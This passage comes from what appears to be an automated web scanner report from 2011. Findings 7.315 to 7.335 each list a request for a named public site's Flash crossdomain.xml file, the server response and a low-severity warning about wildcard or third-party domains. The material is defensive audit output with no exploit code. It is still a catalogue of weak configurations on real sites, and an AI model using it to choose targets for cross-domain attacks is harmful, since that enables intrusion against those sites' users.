Date: Sat, 02 Apr 2011 13:23:47 GMT
Connection: close
Set-Cookie: BIGipServerwww.kraftrecipes.com_80=1251894538.20480.0000; path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.kraftfoods.com" />
<allow-access-from domain="*.greypoupon.com" />
<allow-access-from domain="*.atasteofgreypoupon.com" />
<allow-access-from domain="*.clientstaging.net" />
<allow-access-from domain="*.gigyahosting1.com" />
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="*.doubleclick.com" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.akqa.com" />
<allow-access-from domain="*.comidakraft.com" />
<allow-access-from domain="*.akufen.ca"/>
...[SNIP]...

7.315. http://www.krillion.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.krillion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.krillion.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:59:23 GMT
ETag: "a04a-60-49201c515b780"
Last-Modified: Thu, 07 Oct 2010 07:23:26 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Content-Length: 96
Connection: Close

<cross-domain-policy>
<allow-access-from domain="*.krillion.com" />
</cross-domain-policy>


7.316. http://www.last.fm/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.last.fm
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.last.fm

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 12:14:03 GMT
Server: Apache/1.3.39 (Unix)
X-Proxy-Fix-Up: headers fixed up
Last-Modified: Wed, 10 Dec 2008 15:09:07 GMT
ETag: "32ab-148-493fdb93"
Accept-Ranges: bytes
Content-Length: 328
Content-Type: application/xml
Age: 4738
X-Cache: HIT from cache4.bra.last.fm
X-Cache-Lookup: HIT from cache4.bra.last.fm:8081
Via: 1.0 cache4.bra.last.fm:8081 (squid/2.7.STABLE7)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.last.fm" secure="false" />
...[SNIP]...
<allow-access-from domain="*.audioscrobbler.com"/>
<allow-access-from domain="87.117.229.54" />
...[SNIP]...

7.317. http://www.latimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.latimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.latimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 438
Content-Type: text/xml
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Thu, 03 Mar 2011 02:18:58 GMT
ETag: "1b6-4d6efa92"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:23:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.wp.com"/>
<allow-access-from domain="s-ssl.wordpress.com"/>
<allow-access-from domain="latimesphoto.wordpress.com"/>
<allow-access-from domain="framework.latimes.com"/>
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...

7.318. http://www.legacy.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.legacy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.legacy.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Last-Modified: Thu, 20 Sep 2007 15:10:00 GMT
Accept-Ranges: bytes
ETag: "054d5098fbc71:0"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:43:20 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.legacy.com" /></cross-domain-
...[SNIP]...

7.319. http://www.lego.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lego.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lego.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 429
Content-Type: text/xml
Last-Modified: Tue, 28 Sep 2010 12:54:18 GMT
Accept-Ranges: bytes
ETag: "92a75b43c5fcb1:0"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 13:34:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.lego.com" />
<allow-access-from domain="pserver.mii.instacontent.net" />
<allow-access-from domain="a248.e.akamai.net"/>
<allow-access-from domain="a248.e.akamai-staging.net"/>
...[SNIP]...

7.320. http://www.livecams.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livecams.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livecams.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 19:12:09 GMT
Accept-Ranges: bytes
Content-Length: 218
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.naiadsystems.com" />
</cros
...[SNIP]...

7.321. http://www.livenation.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livenation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livenation.com

Response

HTTP/1.0 200 OK
Server: Apache
X-DC-Name: 1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "4c3-b383d900"
Accept-Ranges: bytes
Content-Length: 1219
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:56:47 GMT
Connection: close
Set-Cookie: SID=-QmTwYpmUo1j2xXa5mSLvoRATZnHJLv52ppaNOelYqaIIBOBGVV2weR19NXDogn2n-8hQ0Ok6NBT3vG5; path=/; domain=www.livenation.com
Set-Cookie: BID=UF2kDjV9k92gQ_eoCjLzZb0cdURDdVoK1Iet64RSLNGmP26Xl7C9TphQHAuk4XGQLZpXO7lj6VQjW-Z4eKW6; path=/; domain=www.livenation.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=IUzxsu9HiFZ/VhQS5I1hB/I1HF5jYp2R; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ticketmaster.co.nz" />
<allow-access-from domain="*.ticketmaster.co.uk" />
<allow-access-from domain="*.ticketmaster.com" />
<allow-access-from domain="*.ticketmaster.com.au" />
<allow-access-from domain="*.ticketmaster.com.mx" />
<allow-access-from domain="*.ticketmaster.de" />
<allow-access-from domain="*.ticketmaster.ie" />
<allow-access-from domain="*.ticketmaster.es" />
<allow-access-from domain="*.ticketmaster.eu" />
<allow-access-from domain="*.ticketmaster.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmcs" secure="false" />
...[SNIP]...
<allow-access-from domain="ticketmaster.co.nz" />
<allow-access-from domain="ticketmaster.co.uk" />
<allow-access-from domain="ticketmaster.com" />
<allow-access-from domain="ticketmaster.com.au" />
<allow-access-from domain="ticketmaster.com.mx" />
<allow-access-from domain="ticketmaster.de" />
<allow-access-from domain="ticketmaster.ie" />
<allow-access-from domain="ticketmaster.es" />
<allow-access-from domain="ticketmaster.eu" />
...[SNIP]...

7.322. http://www.llbean.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.llbean.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.llbean.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 25 Mar 2011 01:41:07 GMT
ETag: "14e9aa7-d8-b00bd2c0"
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:34:27 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELa TRo IND PHY ONL UNI PUR FIN COM NAV DEM STA", policyref="/w3c/p3p.xml"
Content-Type: text/xml
Content-Length: 216
Date: Sat, 02 Apr 2011 13:34:27 GMT
Connection: close
Set-Cookie: TS6e35ec=1ebe56f9a77f69040a6686a9e25a88e360f4929acee22d194d9725e3; Path=/

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.llbean.com" />
</cross-
...[SNIP]...

7.323. http://www.macys.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.macys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.macys.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 28 Feb 2011 22:47:10 GMT
ETag: "9f2da-23c-75c2d780"
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:26:32 GMT
Content-Length: 572
Connection: close
Set-Cookie: stop_mobi=yes; expires=Sat, 02-Apr-2011 13:56:32 GMT; path=/; domain=.macys.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.serving-sys.com" secure="false"/>
...[SNIP]...

7.324. http://www.mail.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mail.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mail.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:28 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 16:06:10 GMT
Accept-Ranges: bytes
Content-Length: 140
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*.mail.com"/>
<allow-access-from domain="*.mailcdn.com"/>
</cross-domain-policy>

7.325. http://www.marykay.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marykay.com

Response

HTTP/1.1 200 OK
Content-Length: 142
Content-Type: text/xml
Last-Modified: Thu, 10 Mar 2011 18:13:17 GMT
Accept-Ranges: bytes
ETag: "62ae35d44edfcb1:a50fa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9E10431F4176002D0D041EAB2F4F7ACA; Path=/; Domain=.marykay.com
Set-Cookie: TLTSID=9E10431F4176002D0D041EAB2F4F7ACA; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Sat, 02 Apr 2011 14:18:37 GMT
Connection: close
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Sat, 09-Apr-2011 14:18:37 GMT; path=/

<cross-domain-policy>
<allow-access-from domain="*.ai-media.com" />
<allow-access-from domain="*.marykay.com" />
</cross-domain-policy>

7.326. http://www.mastercard.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mastercard.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mastercard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:27 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 20:37:56 GMT
ETag: "50b-4e101100"
Accept-Ranges: bytes
Content-Length: 1291
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_xxx.nbtufsdbse.dpn-iuuq=ffffffff099ee93145525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:30:05 GMT;path=/;httponly

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-
...[SNIP]...
<allow-access-from domain="*.mastercard.us" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercardbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.priceless.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercard.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercard.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.chasepayeedirectory.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.chasebillmanager.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.loyaltygateway.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercardeasysavings.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercardbusinesssavings.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercardacquirernews.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ridenynj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ridenewyorknewjersey.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mastercard.co.uk" secure="false"/>
...[SNIP]...

7.327. http://www.match.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.match.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.match.com

Response

HTTP/1.1 200 OK
Content-Length: 529
Content-Type: text/xml
Content-Location: http://www.match.com/crossdomain.xml
Last-Modified: Tue, 28 Dec 2010 22:07:35 GMT
Accept-Ranges: bytes
ETag: "7f249a2dba6cb1:539"
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:38:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.match.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.match.corp" secure="true" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.bing.com" secure="true" />
...[SNIP]...

7.328. http://www.mcafee.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mcafee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mcafee.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 01 Feb 2011 12:17:33 GMT
Accept-Ranges: bytes
ETag: "80ecda0ac2cb1:0"
Server: Microsoft-IIS/7.0
SN: SJV1
Date: Sat, 02 Apr 2011 13:43:27 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Served by WebAcceleration
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
...[SNIP]...
<allow-access-from domain="*.mcafee.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.google-analytics.com" secure="true" />
...[SNIP]...

7.329. http://www.medcohealth.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.medcohealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.medcohealth.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:13 GMT
Last-Modified: Fri, 29 May 2009 19:11:09 GMT
Accept-Ranges: bytes
Content-Length: 288
Connection: close
Content-Type: application/xml
Set-Cookie: TS2d8041=c0f19c17adfe8a426b998fe9ee67e6ba57bf5195c4d0b4fb4d972afd; Path=/

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

7.330. http://www.medscape.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.medscape.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.medscape.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:15 GMT
Server: Apache
Last-Modified: Thu, 15 Oct 2009 13:24:15 GMT
ETag: "159eee-1ae-475f9321e5dc0"
Accept-Ranges: bytes
Content-Length: 430
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_xxx-xfc.qsg.qiy1:80=e2413a273660;expires=Sat, 02-Apr-11 15:14:15 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.medscape.com" />
<allow-access-from domain="*.medsite.com" />
<allow-access-from domain="dme.cybersessions.com" />
<allow-access-from domain="*.emedicine.com" />
<allow-access-from domain="*.digitalrhino.net" />
...[SNIP]...

7.331. http://www.meebo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 13:36:10 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Sat, 12 Mar 2011 00:10:17 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

7.332. http://www.meetlocals.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meetlocals.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meetlocals.com

Response

HTTP/1.1 200 OK
Server: Zeus/4.3
Date: Sat, 02 Apr 2011 13:26:39 GMT
Connection: close
Content-Type: text/xml
Content-Length: 220
Accept-Ranges: bytes
Last-Modified: Tue, 01 Sep 2009 16:40:36 GMT

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="dev.meetlocals.com"/>
<allow-access-from domain="*.meetlocals.com"/>
</
...[SNIP]...

7.333. http://www.meetup.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meetup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meetup.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:19 GMT
Server: Apache-Coyote/1.1
ETag: W/"297-1296133256000"
Last-Modified: Thu, 27 Jan 2011 13:00:56 GMT
Content-Type: text/xml
Content-Length: 297
Vary: Accept-Encoding,User-Agent
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.meetupstatic.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.meetupstatic.com" secure="false" />
...[SNIP]...

7.334. http://www.megaupload.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.megaupload.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.megaupload.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:26 GMT
Server: Apache
Last-Modified: Sun, 28 Nov 2010 08:25:31 GMT
ETag: "275"
Accept-Ranges: bytes
Content-Length: 629
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.megarotic.com" />
<allow-access-from domain="*.sexuploader.com" />
<allow-access-from domain="*.megaupload.com" />
<allow-access-from domain="*.megarotic.com" />
<allow-access-from domain="*.megaupload.com" />
<allow-access-from domain="*.megavideo.com" />
<allow-access-from domain="*.megaflirt.com" />
<allow-access-from domain="*.megaporn.com" />
<allow-access-from domain="*.megaking.com" />
<allow-access-from domain="*.megagogo.com" />
<allow-access-from domain="*.megahelp.com" />
<allow-access-from domain="*.megabest.com" />
...[SNIP]...

7.335. http://www.megavideo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.megavideo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
